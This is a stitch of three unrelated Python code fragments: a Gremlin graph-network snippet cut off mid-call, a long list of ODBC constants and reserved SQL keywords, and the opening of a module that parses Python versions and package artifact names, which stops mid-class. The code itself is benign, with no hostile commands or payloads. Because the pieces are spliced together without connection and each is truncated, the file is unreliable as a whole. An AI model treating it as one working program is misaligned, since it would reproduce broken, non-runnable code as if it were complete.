edge1 = {T.id: '1', T.label: 'route', 'outV': 'v[1]', 'inV': 'v[2]'}
edge2 = {T.id: '2', T.label: 'route', 'outV': 'v[2]', 'inV': 'v[3]'}
gn = GremlinNetwork(edge_display_property='inV')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1, | |
################################################################################
self.SQL_OAC_NONE = 0x0000
self.SQL_OAC_LEVEL1 = 0x0001
self.SQL_OAC_LEVEL2 = 0x0002
################################################################################
####SQLGetInfo - SQL_ODBC_INTERFACE_CONFORMANCE#################################
################################################################################
self.SQL_OIC_CORE = 1
self.SQL_OIC_LEVEL1 = 2
self.SQL_OIC_LEVEL2 = 3
################################################################################
####SQLGetInfo - SQL_ODBC_SAG_CLI_CONFORMANCE###################################
################################################################################
self.SQL_OSCC_NOT_COMPLIANT = 0x0000
self.SQL_OSCC_COMPLIANT = 0x0001
################################################################################
####SQLGetInfo - SQL_ODBC_SQL_CONFORMANCE#######################################
################################################################################
self.SQL_OSC_MINIMUM = 0x0000
self.SQL_OSC_CORE = 0x0001
self.SQL_OSC_EXTENDED = 0x0002
################################################################################
####SQLGetInfo - SQL_OWNER_USAGE################################################
################################################################################
self.SQL_OU_DML_STATEMENTS = 0x00000001
self.SQL_OU_PROCEDURE_INVOCATION = 0x00000002
self.SQL_OU_TABLE_DEFINITION = 0x00000004
self.SQL_OU_INDEX_DEFINITION = 0x00000008
self.SQL_OU_PRIVILEGE_DEFINITION = 0x00000010
################################################################################
####SQLGetInfo - SQL_PARAM_ARRAY_ROW_COUNTS#####################################
################################################################################
self.SQL_PARC_BATCH = 1
self.SQL_PARC_NO_BATCH = 2
################################################################################
####SQLGetInfo - SQL_PARAM_ARRAY_SELECTS########################################
################################################################################
self.SQL_PAS_BATCH = 1
self.SQL_PAS_NO_BATCH = 2
self.SQL_PAS_NO_SELECT = 3
################################################################################
####SQLGetInfo - SQL_POSITIONED_STATEMENTS######################################
################################################################################
self.SQL_PS_POSITIONED_DELETE = 0x00000001
self.SQL_PS_POSITIONED_UPDATE = 0x00000002
self.SQL_PS_SELECT_FOR_UPDATE = 0x00000004
################################################################################
####SQLGetInfo - SQL_QUALIFIER_LOCATION#########################################
################################################################################
self.SQL_QL_START = 0x0001
self.SQL_QL_END = 0x0002
################################################################################
####SQLGetInfo - SQL_CATALOG_LOCATION###########################################
################################################################################
self.SQL_CL_START = self.SQL_QL_START
self.SQL_CL_END = self.SQL_QL_END
################################################################################
####SQLGetInfo - SQL_QUALIFIER_USAGE############################################
################################################################################
self.SQL_QU_DML_STATEMENTS = 0x00000001
self.SQL_QU_PROCEDURE_INVOCATION = 0x00000002
self.SQL_QU_TABLE_DEFINITION = 0x00000004
self.SQL_QU_INDEX_DEFINITION = 0x00000008
self.SQL_QU_PRIVILEGE_DEFINITION = 0x00000010
################################################################################
####SQLGetInfo - SQL_CATALOG_USAGE##############################################
################################################################################
self.SQL_CU_DML_STATEMENTS = self.SQL_QU_DML_STATEMENTS
self.SQL_CU_PROCEDURE_INVOCATION = self.SQL_QU_PROCEDURE_INVOCATION
self.SQL_CU_TABLE_DEFINITION = self.SQL_QU_TABLE_DEFINITION
self.SQL_CU_INDEX_DEFINITION = self.SQL_QU_INDEX_DEFINITION
self.SQL_CU_PRIVILEGE_DEFINITION = self.SQL_QU_PRIVILEGE_DEFINITION
################################################################################
####SQLGetInfo - SQL_SCHEMA_USAGE###############################################
################################################################################
self.SQL_SU_DML_STATEMENTS = self.SQL_OU_DML_STATEMENTS
self.SQL_SU_PROCEDURE_INVOCATION = self.SQL_OU_PROCEDURE_INVOCATION
self.SQL_SU_TABLE_DEFINITION = self.SQL_OU_TABLE_DEFINITION
self.SQL_SU_INDEX_DEFINITION = self.SQL_OU_INDEX_DEFINITION
self.SQL_SU_PRIVILEGE_DEFINITION = self.SQL_OU_PRIVILEGE_DEFINITION
################################################################################
####SQLGetInfo - SQL_SCROLL_OPTIONS#############################################
################################################################################
self.SQL_SO_FORWARD_ONLY = 0x00000001
self.SQL_SO_KEYSET_DRIVEN = 0x00000002
self.SQL_SO_DYNAMIC = 0x00000004
self.SQL_SO_MIXED = 0x00000008
self.SQL_SO_STATIC = 0x00000010
################################################################################
####SQLGetInfo - SQL_SQL_CONFORMANCE############################################
################################################################################
self.SQL_SC_SQL92_ENTRY = 0x00000001
self.SQL_SC_FIPS127_2_TRANSITIONAL = 0x00000002
self.SQL_SC_SQL92_INTERMEDIATE = 0x00000004
self.SQL_SC_SQL92_FULL = 0x00000008
################################################################################
####SQLGetInfo - SQL_SQL92_DATETIME_FUNCTIONS###################################
################################################################################
self.SQL_SDF_CURRENT_DATE = 0x00000001
self.SQL_SDF_CURRENT_TIME = 0x00000002
self.SQL_SDF_CURRENT_TIMESTAMP = 0x00000004
################################################################################
####SQLGetInfo - SQL_SQL92_FOREIGN_KEY_DELETE_RULE##############################
################################################################################
self.SQL_SFKD_CASCADE = 0x00000001
self.SQL_SFKD_NO_ACTION = 0x00000002
self.SQL_SFKD_SET_DEFAULT = 0x00000004
self.SQL_SFKD_SET_NULL = 0x00000008
################################################################################
####SQLGetInfo - SQL_SQL92_FOREIGN_KEY_UPDATE_RULE##############################
################################################################################
self.SQL_SFKU_CASCADE = 0x00000001
self.SQL_SFKU_NO_ACTION = 0x00000002
self.SQL_SFKU_SET_DEFAULT = 0x00000004
self.SQL_SFKU_SET_NULL = 0x00000008
################################################################################
####SQLGetInfo - SQL_SQL92_GRANT################################################
################################################################################
self.SQL_SG_USAGE_ON_DOMAIN = 0x00000001
self.SQL_SG_USAGE_ON_CHARACTER_SET = 0x00000002
self.SQL_SG_USAGE_ON_COLLATION = 0x00000004
self.SQL_SG_USAGE_ON_TRANSLATION = 0x00000008
self.SQL_SG_WITH_GRANT_OPTION = 0x00000010
self.SQL_SG_DELETE_TABLE = 0x00000020
self.SQL_SG_INSERT_TABLE = 0x00000040
self.SQL_SG_INSERT_COLUMN = 0x00000080
self.SQL_SG_REFERENCES_TABLE = 0x00000100
self.SQL_SG_REFERENCES_COLUMN = 0x00000200
self.SQL_SG_SELECT_TABLE = 0x00000400
self.SQL_SG_UPDATE_TABLE = 0x00000800
self.SQL_SG_UPDATE_COLUMN = 0x00001000
################################################################################
####SQLGetInfo - SQL_SQL92_NUMERIC_VALUE_FUNCTIONS##############################
################################################################################
self.SQL_SNVF_BIT_LENGTH = 0x00000001
self.SQL_SNVF_CHAR_LENGTH = 0x00000002
self.SQL_SNVF_CHARACTER_LENGTH = 0x00000004
self.SQL_SNVF_EXTRACT = 0x00000008
self.SQL_SNVF_OCTET_LENGTH = 0x00000010
self.SQL_SNVF_POSITION = 0x00000020
################################################################################
####SQLGetInfo - SQL_SQL92_PREDICATES###########################################
################################################################################
self.SQL_SP_EXISTS = 0x00000001
self.SQL_SP_ISNOTNULL = 0x00000002
self.SQL_SP_ISNULL = 0x00000004
self.SQL_SP_MATCH_FULL = 0x00000008
self.SQL_SP_MATCH_PARTIAL = 0x00000010
self.SQL_SP_MATCH_UNIQUE_FULL = 0x00000020
self.SQL_SP_MATCH_UNIQUE_PARTIAL = 0x00000040
self.SQL_SP_OVERLAPS = 0x00000080
self.SQL_SP_UNIQUE = 0x00000100
self.SQL_SP_LIKE = 0x00000200
self.SQL_SP_IN = 0x00000400
self.SQL_SP_BETWEEN = 0x00000800
self.SQL_SP_COMPARISON = 0x00001000
self.SQL_SP_QUANTIFIED_COMPARISON = 0x00002000
################################################################################
####SQLGetInfo - SQL_SQL92_RELATIONAL_JOIN_OPERATORS############################
################################################################################
self.SQL_SRJO_CORRESPONDING_CLAUSE = 0x00000001
self.SQL_SRJO_CROSS_JOIN = 0x00000002
self.SQL_SRJO_EXCEPT_JOIN = 0x00000004
self.SQL_SRJO_FULL_OUTER_JOIN = 0x00000008
self.SQL_SRJO_INNER_JOIN = 0x00000010
self.SQL_SRJO_INTERSECT_JOIN = 0x00000020
self.SQL_SRJO_LEFT_OUTER_JOIN = 0x00000040
self.SQL_SRJO_NATURAL_JOIN = 0x00000080
self.SQL_SRJO_RIGHT_OUTER_JOIN = 0x00000100
self.SQL_SRJO_UNION_JOIN = 0x00000200
################################################################################
####SQLGetInfo - SQL_SQL92_REVOKE###############################################
################################################################################
self.SQL_SR_USAGE_ON_DOMAIN = 0x00000001
self.SQL_SR_USAGE_ON_CHARACTER_SET = 0x00000002
self.SQL_SR_USAGE_ON_COLLATION = 0x00000004
self.SQL_SR_USAGE_ON_TRANSLATION = 0x00000008
self.SQL_SR_GRANT_OPTION_FOR = 0x00000010
self.SQL_SR_CASCADE = 0x00000020
self.SQL_SR_RESTRICT = 0x00000040
self.SQL_SR_DELETE_TABLE = 0x00000080
self.SQL_SR_INSERT_TABLE = 0x00000100
self.SQL_SR_INSERT_COLUMN = 0x00000200
self.SQL_SR_REFERENCES_TABLE = 0x00000400
self.SQL_SR_REFERENCES_COLUMN = 0x00000800
self.SQL_SR_SELECT_TABLE = 0x00001000
self.SQL_SR_UPDATE_TABLE = 0x00002000
self.SQL_SR_UPDATE_COLUMN = 0x00004000
################################################################################
####SQLGetInfo - SQL_SQL92_ROW_VALUE_CONSTRUCTOR################################
################################################################################
self.SQL_SRVC_VALUE_EXPRESSION = 0x00000001
self.SQL_SRVC_NULL = 0x00000002
self.SQL_SRVC_DEFAULT = 0x00000004
self.SQL_SRVC_ROW_SUBQUERY = 0x00000008
################################################################################
####SQLGetInfo - SQL_SQL92_STRING_FUNCTIONS#####################################
################################################################################
self.SQL_SSF_CONVERT = 0x00000001
self.SQL_SSF_LOWER = 0x00000002
self.SQL_SSF_UPPER = 0x00000004
self.SQL_SSF_SUBSTRING = 0x00000008
self.SQL_SSF_TRANSLATE = 0x00000010
self.SQL_SSF_TRIM_BOTH = 0x00000020
self.SQL_SSF_TRIM_LEADING = 0x00000040
self.SQL_SSF_TRIM_TRAILING = 0x00000080
################################################################################
####SQLGetInfo - SQL_SQL92_VALUE_EXPRESSIONS####################################
################################################################################
self.SQL_SVE_CASE = 0x00000001
self.SQL_SVE_CAST = 0x00000002
self.SQL_SVE_COALESCE = 0x00000004
self.SQL_SVE_NULLIF = 0x00000008
################################################################################
####SQLGetInfo - SQL_STANDARD_CLI_CONFORMANCE###################################
################################################################################
self.SQL_SCC_XOPEN_CLI_VERSION1 = 0x00000001
self.SQL_SCC_ISO92_CLI = 0x00000002
################################################################################
####SQLGetInfo - SQL_STATIC_SENSITIVITY#########################################
################################################################################
self.SQL_SS_ADDITIONS = 0x00000001
self.SQL_SS_DELETIONS = 0x00000002
self.SQL_SS_UPDATES = 0x00000004
################################################################################
####SQLGetInfo - SQL_SUBQUERIES#################################################
################################################################################
self.SQL_SQ_COMPARISON = 0x00000001
self.SQL_SQ_EXISTS = 0x00000002
self.SQL_SQ_IN = 0x00000004
self.SQL_SQ_QUANTIFIED = 0x00000008
self.SQL_SQ_CORRELATED_SUBQUERIES = 0x00000010
################################################################################
####SQLGetInfo - SQL_SYSTEM_FUNCTIONS###########################################
################################################################################
self.SQL_FN_SYS_USERNAME = 0x00000001
self.SQL_FN_SYS_DBNAME = 0x00000002
self.SQL_FN_SYS_IFNULL = 0x00000004
################################################################################
####SQLGetInfo - SQL_STRING_FUNCTIONS###########################################
################################################################################
self.SQL_FN_STR_CONCAT = 0x00000001
self.SQL_FN_STR_INSERT = 0x00000002
self.SQL_FN_STR_LEFT = 0x00000004
self.SQL_FN_STR_LTRIM = 0x00000008
self.SQL_FN_STR_LENGTH = 0x00000010
self.SQL_FN_STR_LOCATE = 0x00000020
self.SQL_FN_STR_LCASE = 0x00000040
self.SQL_FN_STR_REPEAT = 0x00000080
self.SQL_FN_STR_REPLACE = 0x00000100
self.SQL_FN_STR_RIGHT = 0x00000200
self.SQL_FN_STR_RTRIM = 0x00000400
self.SQL_FN_STR_SUBSTRING = 0x00000800
self.SQL_FN_STR_UCASE = 0x00001000
self.SQL_FN_STR_ASCII = 0x00002000
self.SQL_FN_STR_CHAR = 0x00004000
self.SQL_FN_STR_DIFFERENCE = 0x00008000
self.SQL_FN_STR_LOCATE_2 = 0x00010000
self.SQL_FN_STR_SOUNDEX = 0x00020000
self.SQL_FN_STR_SPACE = 0x00040000
self.SQL_FN_STR_BIT_LENGTH = 0x00080000
self.SQL_FN_STR_CHAR_LENGTH = 0x00100000
self.SQL_FN_STR_CHARACTER_LENGTH = 0x00200000
self.SQL_FN_STR_OCTET_LENGTH = 0x00400000
self.SQL_FN_STR_POSITION = 0x00800000
################################################################################
####SQLGetInfo - SQL_TIMEDATE_ADD_INTERVALS#####################################
####SQLGetInfo - SQL_TIMEDATE_DIFF_INTERVALS####################################
################################################################################
self.SQL_FN_TSI_FRAC_SECOND = 0x00000001
self.SQL_FN_TSI_SECOND = 0x00000002
self.SQL_FN_TSI_MINUTE = 0x00000004
self.SQL_FN_TSI_HOUR = 0x00000008
self.SQL_FN_TSI_DAY = 0x00000010
self.SQL_FN_TSI_WEEK = 0x00000020
self.SQL_FN_TSI_MONTH = 0x00000040
self.SQL_FN_TSI_QUARTER = 0x00000080
self.SQL_FN_TSI_YEAR = 0x00000100
################################################################################
####SQLGetInfo - SQL_TIMEDATE_FUNCTIONS#########################################
################################################################################
self.SQL_FN_TD_NOW = 0x00000001
self.SQL_FN_TD_CURDATE = 0x00000002
self.SQL_FN_TD_DAYOFMONTH = 0x00000004
self.SQL_FN_TD_DAYOFWEEK = 0x00000008
self.SQL_FN_TD_DAYOFYEAR = 0x00000010
self.SQL_FN_TD_MONTH = 0x00000020
self.SQL_FN_TD_QUARTER = 0x00000040
self.SQL_FN_TD_WEEK = 0x00000080
self.SQL_FN_TD_YEAR = 0x00000100
self.SQL_FN_TD_CURTIME = 0x00000200
self.SQL_FN_TD_HOUR = 0x00000400
self.SQL_FN_TD_MINUTE = 0x00000800
self.SQL_FN_TD_SECOND = 0x00001000
self.SQL_FN_TD_TIMESTAMPADD = 0x00002000
self.SQL_FN_TD_TIMESTAMPDIFF = 0x00004000
self.SQL_FN_TD_DAYNAME = 0x00008000
self.SQL_FN_TD_MONTHNAME = 0x00010000
self.SQL_FN_TD_CURRENT_DATE = 0x00020000
self.SQL_FN_TD_CURRENT_TIME = 0x00040000
self.SQL_FN_TD_CURRENT_TIMESTAMP = 0x00080000
self.SQL_FN_TD_EXTRACT = 0x00100000
################################################################################
####SQLGetInfo - SQL_TXN_ISOLATION_OPTION#######################################
################################################################################
self.SQL_TXN_VERSIONING = 0x00000010
################################################################################
####SQLGetInfo - SQL_UNION######################################################
################################################################################
self.SQL_U_UNION = 0x00000001
self.SQL_U_UNION_ALL = 0x00000002
################################################################################
####SQLGetInfo - SQL_UNION_STATEMENT############################################
################################################################################
self.SQL_US_UNION = self.SQL_U_UNION
self.SQL_US_UNION_ALL = self.SQL_U_UNION_ALL
################################################################################
####SQLGetStmtAttr - ODBC 2.x attributes########################################
################################################################################
self.SQL_QUERY_TIMEOUT = 0
self.SQL_MAX_ROWS = 1
self.SQL_NOSCAN = 2
self.SQL_MAX_LENGTH = 3
self.SQL_ASYNC_ENABLE = 4
self.SQL_BIND_TYPE = 5
self.SQL_CURSOR_TYPE = 6
self.SQL_CONCURRENCY = 7
self.SQL_KEYSET_SIZE = 8
self.SQL_ROWSET_SIZE = 9
self.SQL_SIMULATE_CURSOR = 10
self.SQL_RETRIEVE_DATA = 11
self.SQL_USE_BOOKMARKS = 12
self.SQL_GET_BOOKMARK = 13
self.SQL_ROW_NUMBER = 14
################################################################################
####SQLGetStmtAttr - ODBC 3.x attributes########################################
################################################################################
self.SQL_ATTR_ASYNC_ENABLE = 4
self.SQL_ATTR_CONCURRENCY = self.SQL_CONCURRENCY
self.SQL_ATTR_CURSOR_TYPE = self.SQL_CURSOR_TYPE
self.SQL_ATTR_ENABLE_AUTO_IPD = 15
self.SQL_ATTR_FETCH_BOOKMARK_PTR = 16
self.SQL_ATTR_KEYSET_SIZE = self.SQL_KEYSET_SIZE
self.SQL_ATTR_MAX_LENGTH = self.SQL_MAX_LENGTH
self.SQL_ATTR_MAX_ROWS = self.SQL_MAX_ROWS
self.SQL_ATTR_NOSCAN = self.SQL_NOSCAN
self.SQL_ATTR_PARAM_BIND_OFFSET_PTR = 17
self.SQL_ATTR_PARAM_BIND_TYPE = 18
self.SQL_ATTR_PARAM_OPERATION_PTR = 19
self.SQL_ATTR_PARAM_STATUS_PTR = 20
self.SQL_ATTR_PARAMS_PROCESSED_PTR = 21
self.SQL_ATTR_PARAMSET_SIZE = 22
self.SQL_ATTR_QUERY_TIMEOUT = self.SQL_QUERY_TIMEOUT
self.SQL_ATTR_RETRIEVE_DATA = self.SQL_RETRIEVE_DATA
self.SQL_ATTR_ROW_BIND_OFFSET_PTR = 23
self.SQL_ATTR_ROW_BIND_TYPE = self.SQL_BIND_TYPE
self.SQL_ATTR_ROW_NUMBER = self.SQL_ROW_NUMBER
self.SQL_ATTR_ROW_OPERATION_PTR = 24
self.SQL_ATTR_ROW_STATUS_PTR = 25
self.SQL_ATTR_ROWS_FETCHED_PTR = 26
self.SQL_ATTR_ROW_ARRAY_SIZE = 27
self.SQL_ATTR_SIMULATE_CURSOR = self.SQL_SIMULATE_CURSOR
self.SQL_ATTR_USE_BOOKMARKS = self.SQL_USE_BOOKMARKS
self.SQL_STMT_OPT_MAX = self.SQL_ROW_NUMBER
self.SQL_STMT_OPT_MIN = self.SQL_QUERY_TIMEOUT
################################################################################
####SQLGetStmtAttr - SQL_ATTR_ASYNC_ENABLE######################################
################################################################################
self.SQL_ASYNC_ENABLE_OFF = 0
self.SQL_ASYNC_ENABLE_ON = 1
self.SQL_ASYNC_ENABLE_DEFAULT = self.SQL_ASYNC_ENABLE_OFF
################################################################################
####SQLGetStmtAttr - SQL_ATTR_PARAM_BIND_TYPE###################################
################################################################################
self.SQL_PARAM_BIND_BY_COLUMN = 0
self.SQL_PARAM_BIND_TYPE_DEFAULT = self.SQL_PARAM_BIND_BY_COLUMN
################################################################################
####SQLGetStmtAttr - SQL_BIND_TYPE##############################################
################################################################################
self.SQL_BIND_BY_COLUMN = 0
self.SQL_BIND_TYPE_DEFAULT = self.SQL_BIND_BY_COLUMN
################################################################################
####SQLGetStmtAttr - SQL_CONCURRENCY############################################
################################################################################
self.SQL_CONCUR_READ_ONLY = 1
self.SQL_CONCUR_LOCK = 2
self.SQL_CONCUR_ROWVER = 3
self.SQL_CONCUR_VALUES = 4
self.SQL_CONCUR_DEFAULT = self.SQL_CONCUR_READ_ONLY
################################################################################
####SQLGetStmtAttr - SQL_CURSOR_TYPE############################################
################################################################################
self.SQL_CURSOR_FORWARD_ONLY = 0
self.SQL_CURSOR_KEYSET_DRIVEN = 1
self.SQL_CURSOR_DYNAMIC = 2
self.SQL_CURSOR_STATIC = 3
self.SQL_CURSOR_TYPE_DEFAULT = self.SQL_CURSOR_FORWARD_ONLY
################################################################################
####SQLGetStmtAttr - SQL_KEYSET_SIZE############################################
################################################################################
self.SQL_KEYSET_SIZE_DEFAULT = 0
################################################################################
####SQLGetStmtAttr - SQL_MAX_LENGTH#############################################
################################################################################
self.SQL_MAX_LENGTH_DEFAULT = 0
################################################################################
####SQLGetStmtAttr - SQL_MAX_ROWS###############################################
################################################################################
self.SQL_MAX_ROWS_DEFAULT = 0
################################################################################
####SQLGetStmtAttr - SQL_NOSCAN#################################################
################################################################################
self.SQL_NOSCAN_OFF = 0
self.SQL_NOSCAN_ON = 1
self.SQL_NOSCAN_DEFAULT = self.SQL_NOSCAN_OFF
################################################################################
####SQLGetStmtAttr - SQL_QUERY_TIMEOUT##########################################
################################################################################
self.SQL_QUERY_TIMEOUT_DEFAULT = 0
################################################################################
####SQLGetStmtAttr - SQL_RETRIEVE_DATA##########################################
################################################################################
self.SQL_RD_OFF = 0
self.SQL_RD_ON = 1
self.SQL_RD_DEFAULT = self.SQL_RD_ON
################################################################################
####SQLGetStmtAttr - SQL_ROWSET_SIZE############################################
################################################################################
self.SQL_ROWSET_SIZE_DEFAULT = 1
################################################################################
####SQLGetStmtAttr - SQL_SIMULATE_CURSOR########################################
################################################################################
self.SQL_SC_NON_UNIQUE = 0
self.SQL_SC_TRY_UNIQUE = 1
self.SQL_SC_UNIQUE = 2
################################################################################
####SQLGetStmtAttr - SQL_USE_BOOKMARKS##########################################
################################################################################
self.SQL_UB_OFF = 0
self.SQL_UB_ON = 1
self.SQL_UB_DEFAULT = self.SQL_UB_OFF
self.SQL_UB_FIXED = self.SQL_UB_ON
self.SQL_UB_VARIABLE = 2
################################################################################
####SQLGetTypeInfo - SEARCHABLE#################################################
################################################################################
self.SQL_COL_PRED_CHAR = self.SQL_LIKE_ONLY
self.SQL_COL_PRED_BASIC = self.SQL_ALL_EXCEPT_LIKE
################################################################################
####SQLSetPos###################################################################
################################################################################
self.SQL_ENTIRE_ROWSET = 0
################################################################################
####SQLSetPos - Operation#######################################################
################################################################################
self.SQL_POSITION = 0
self.SQL_REFRESH = 1
self.SQL_UPDATE = 2
self.SQL_DELETE = 3
################################################################################
####SQLBulkOperations - Operation###############################################
################################################################################
self.SQL_ADD = 4
self.SQL_SETPOS_MAX_OPTION_VALUE = self.SQL_ADD
self.SQL_UPDATE_BY_BOOKMARK = 5
self.SQL_DELETE_BY_BOOKMARK = 6
self.SQL_FETCH_BY_BOOKMARK = 7
################################################################################
####SQLSetPos - LockType########################################################
################################################################################
self.SQL_LOCK_NO_CHANGE = 0
self.SQL_LOCK_EXCLUSIVE = 1
self.SQL_LOCK_UNLOCK = 2
self.SQL_SETPOS_MAX_LOCK_VALUE = self.SQL_LOCK_UNLOCK
################################################################################
####SQLSetPos macros############################################################
################################################################################
#TODO: Map self.SQLSetPos macros
self.SQL_POSITION_TO = self.UnimplementedSQLFunction
self.SQL_LOCK_RECORD = self.UnimplementedSQLFunction
self.SQL_REFRESH_RECORD = self.UnimplementedSQLFunction
self.SQL_UPDATE_RECORD = self.UnimplementedSQLFunction
self.SQL_DELETE_RECORD = self.UnimplementedSQLFunction
self.SQL_ADD_RECORD = self.UnimplementedSQLFunction
################################################################################
####SQLSpecialColumns - Column types and scopes#################################
################################################################################
self.SQL_BEST_ROWID = 1
self.SQL_ROWVER = 2
################################################################################
####All the ODBC keywords#######################################################
################################################################################
# Comma-separated list of all ODBC reserved keywords, per the SQLGetInfo
# SQL_KEYWORDS / ODBC reserved-word list.
# NOTE(review): fixed a missing comma after "ROWS" — the adjacent string
# literals previously concatenated to "ROWSSCHEMA", corrupting two keywords.
self.SQL_ODBC_KEYWORDS = ("ABSOLUTE,ACTION,ADA,ADD,ALL,ALLOCATE,ALTER,AND,ANY,ARE,AS,"
                          "ASC,ASSERTION,AT,AUTHORIZATION,AVG,"
                          "BEGIN,BETWEEN,BIT,BIT_LENGTH,BOTH,BY,CASCADE,CASCADED,CASE,CAST,CATALOG,"
                          "CHAR,CHAR_LENGTH,CHARACTER,CHARACTER_LENGTH,CHECK,CLOSE,COALESCE,"
                          "COLLATE,COLLATION,COLUMN,COMMIT,CONNECT,CONNECTION,CONSTRAINT,"
                          "CONSTRAINTS,CONTINUE,CONVERT,CORRESPONDING,COUNT,CREATE,CROSS,CURRENT,"
                          "CURRENT_DATE,CURRENT_TIME,CURRENT_TIMESTAMP,CURRENT_USER,CURSOR,"
                          "DATE,DAY,DEALLOCATE,DEC,DECIMAL,DECLARE,DEFAULT,DEFERRABLE,"
                          "DEFERRED,DELETE,DESC,DESCRIBE,DESCRIPTOR,DIAGNOSTICS,DISCONNECT,"
                          "DISTINCT,DOMAIN,DOUBLE,DROP,"
                          "ELSE,END,END-EXEC,ESCAPE,EXCEPT,EXCEPTION,EXEC,EXECUTE,"
                          "EXISTS,EXTERNAL,EXTRACT,"
                          "FALSE,FETCH,FIRST,FLOAT,FOR,FOREIGN,FORTRAN,FOUND,FROM,FULL,"
                          "GET,GLOBAL,GO,GOTO,GRANT,GROUP,HAVING,HOUR,"
                          "IDENTITY,IMMEDIATE,IN,INCLUDE,INDEX,INDICATOR,INITIALLY,INNER,"
                          "INPUT,INSENSITIVE,INSERT,INT,INTEGER,INTERSECT,INTERVAL,INTO,IS,ISOLATION,"
                          "JOIN,KEY,LANGUAGE,LAST,LEADING,LEFT,LEVEL,LIKE,LOCAL,LOWER,"
                          "MATCH,MAX,MIN,MINUTE,MODULE,MONTH,"
                          "NAMES,NATIONAL,NATURAL,NCHAR,NEXT,NO,NONE,NOT,NULL,NULLIF,NUMERIC,"
                          "OCTET_LENGTH,OF,ON,ONLY,OPEN,OPTION,OR,ORDER,OUTER,OUTPUT,OVERLAPS,"
                          "PAD,PARTIAL,PASCAL,PLI,POSITION,PRECISION,PREPARE,PRESERVE,"
                          "PRIMARY,PRIOR,PRIVILEGES,PROCEDURE,PUBLIC,"
                          "READ,REAL,REFERENCES,RELATIVE,RESTRICT,REVOKE,RIGHT,ROLLBACK,ROWS,"
                          "SCHEMA,SCROLL,SECOND,SECTION,SELECT,SESSION,SESSION_USER,SET,SIZE,"
                          "SMALLINT,SOME,SPACE,SQL,SQLCA,SQLCODE,SQLERROR,SQLSTATE,SQLWARNING,"
                          "SUBSTRING,SUM,SYSTEM_USER,"
                          "TABLE,TEMPORARY,THEN,TIME,TIMESTAMP,TIMEZONE_HOUR,TIMEZONE_MINUTE,"
                          "TO,TRAILING,TRANSACTION,TRANSLATE,TRANSLATION,TRIM,TRUE,"
                          "UNION,UNIQUE,UNKNOWN,UPDATE,UPPER,USAGE,USER,USING,"
                          "VALUE,VALUES,VARCHAR,VARYING,VIEW,WHEN,WHENEVER,WHERE,WITH,WORK,WRITE,"
                          "YEAR,ZONE")
################################################################################
####Level 2 | |
import json
import os
import re
import sys
from collections import defaultdict
from runez.file import ls_dir, parent_folder, to_path
from runez.http import RestClient, urljoin
from runez.program import is_executable, run
from runez.system import _R, abort, cached_property, flattened, joined, ltattr, resolved_path, short, stringified, UNSET
# Canonical family name for the reference CPython interpreter
CPYTHON = "cpython"
# Python families recognized by guess_family()
PYTHON_FAMILIES = (CPYTHON, "pypy", "conda")
# A bare family name (letters, optional trailing digit), optionally followed by a ':' or '-' separator
R_FAMILY = re.compile(r"^([a-z]+\d?)[:-]?$")
# A spec of the form "[family][sep]version", where family and separator are optional (e.g. "cpython:3.9" or "3.9")
R_SPEC = re.compile(r"^([a-z][a-z\d]*?)?([:-])?(\d[^:-]*)$", re.IGNORECASE)
# PEP 440-like version: optional 'v' prefix and epoch, dotted release digits,
# optional pre-release (a/b/c/rc), optional .dev/.post/.final, optional +local part;
# any trailing text is captured in the last group
R_VERSION = re.compile(r"v?((\d+!)?(\d+)((\.(\d+))*)((a|b|c|rc)(\d+))?(\.(dev|post|final)\.?(\d+))?(\+[\w.-]*)?)(.*)")
def get_current_version(components=3):
    """Version of the currently running interpreter, truncated to `components` parts (default: major.minor.patch)"""
    parts = sys.version_info[:components]
    return Version(".".join(map(str, parts)))
def guess_family(text):
    """
    Args:
        text (str | None): Text to examine

    Returns:
        (str): Guessed python family from given 'text' (typically path to installation)
    """
    if not text:
        return CPYTHON  # Default family when there is nothing to examine

    if text in ("p", "py", "python"):
        return CPYTHON  # Common shorthands for the reference interpreter

    match = R_FAMILY.match(text)
    if match:
        return match.group(1)  # 'text' is a bare family name (possibly with trailing separator)

    # Otherwise, look for a known family name appearing anywhere in 'text'
    return next((family for family in PYTHON_FAMILIES if family in text), CPYTHON)
class ArtifactInfo:
    """Info extracted from a typical python build artifact basename"""

    def __init__(self, basename, package_name, version, is_wheel=False, source=None, tags=None, wheel_build_number=None):
        """
        Args:
            basename (str): Basename of artifact
            package_name (str): Package name, may not be completely standard
            version (Version): Package version
            is_wheel (bool): Is this artifact a wheel?
            source: Optional arbitrary object to track provenance of ArtifactInfo
            tags (str | None): Wheel tags, if any
            wheel_build_number (str | None): Wheel build number, if any
        """
        self.basename = basename
        self.package_name = package_name
        self.pypi_name = PypiStd.std_package_name(package_name)  # Normalized pypi name (None if not acceptable)
        self.relative_url = "%s/%s" % (self.pypi_name, basename)
        self.version = version
        self.is_wheel = is_wheel
        self.source = source
        self.tags = tags
        self.wheel_build_number = wheel_build_number

    @classmethod
    def from_basename(cls, basename, source=None):
        """
        Args:
            basename (str): Basename to parse
            source: Optional arbitrary object to track provenance of ArtifactInfo

        Returns:
            (ArtifactInfo | None): Parsed artifact info, if any
        """
        is_wheel = tags = wheel_build_number = None
        match = PypiStd.RX_SDIST.match(basename)
        if match is None:
            match = PypiStd.RX_WHEEL.match(basename)
            if match is None:
                return None  # Neither an sdist nor a wheel basename

            is_wheel = True
            wheel_build_number = match.group(4)
            tags = match.group(5)

        # RX_SDIST and RX_WHEEL both yield package_name and version as match groups 1 and 2
        parsed_version = Version(match.group(2))
        return cls(
            basename, match.group(1), parsed_version,
            is_wheel=is_wheel, source=source, tags=tags, wheel_build_number=wheel_build_number,
        )

    def __repr__(self):
        return self.relative_url or self.basename

    def __eq__(self, other):
        return isinstance(other, ArtifactInfo) and self.basename == other.basename

    def __lt__(self, other):
        """Ordered by source, then pypi_name, then version, then category"""
        return ltattr(self, other, "source", "pypi_name", "version", "category", t=ArtifactInfo)

    @property
    def category(self):
        return "source distribution" if not self.is_wheel else "wheel"

    @property
    def is_dirty(self):
        # Dirty when version is missing/falsy, or its text carries a "dirty" marker
        if not self.version:
            return True

        return "dirty" in self.version.text
class PypiStd:
    """
    Check/standardize pypi package names
    More strict than actual pypi (for example: names starting with a number are not considered valid)
    """

    # Acceptable package name: starts with a letter, ends with a letter or digit, word chars / dots / dashes in between
    RX_ACCEPTABLE_PACKAGE_NAME = re.compile(r"^[a-z][\w.-]*[a-z\d]$", re.IGNORECASE)
    # Runs of non-alphanumeric/dash chars, or repeated dashes, to collapse into a single dash (std_package_name)
